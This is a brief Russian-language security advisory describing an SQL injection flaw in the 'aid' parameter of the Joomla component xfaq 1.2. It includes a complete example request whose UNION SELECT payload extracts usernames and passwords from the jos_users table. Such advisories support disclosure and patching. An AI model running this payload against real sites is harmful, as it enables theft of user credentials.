Программа: Joomla Component xfaq 1.2

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «aid» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97& aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/* */concat(username,0x3a,password),0x3a,password,0x3a, username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*



Оставить мнение